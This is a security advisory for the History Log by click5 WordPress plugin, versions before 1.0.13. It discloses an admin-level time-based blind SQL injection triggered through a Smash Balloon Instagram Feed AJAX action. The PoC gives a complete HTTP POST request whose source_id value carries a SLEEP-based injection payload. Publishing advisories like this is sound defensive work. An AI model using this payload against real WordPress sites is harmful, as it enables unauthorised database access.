History Log by click5 < 1.0.13 - Admin+ Time-Based Blind SQL Injection

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.

PoC

[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on “Delete Source”. SQL Injection occurs via the “?source_id” parameter in the below POST request: ================== POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 192.168.178.130 Content-Length: 526 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv Accept: / Origin: http://192.168.178.130 Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&amp;view;=general Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: – SNIP – Connection: close ------WebKitFormBoundaryIll2x5Ak4Efzv3Gv Content-Disposition: form-data; name=“action” sbi_feed_saver_manager_delete_source ------WebKitFormBoundaryIll2x5Ak4Efzv3Gv Content-Disposition: form-data; name=“source_id” 2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM) ------WebKitFormBoundaryIll2x5Ak4Efzv3Gv Content-Disposition: form-data; name=“username” pentester14598 ------WebKitFormBoundaryIll2x5Ak4Efzv3Gv Content-Disposition: form-data; name=“nonce” 036ad97501 ------WebKitFormBoundaryIll2x5Ak4Efzv3Gv-- ================== The AJAX hook “wp_ajax_sbi_feed_saver_manager_delete_source” subsequently passes the value of “source_id” and triggers the vulnerable SQL statement within History Log’s function “click5_sbi_instagram_delete_source”.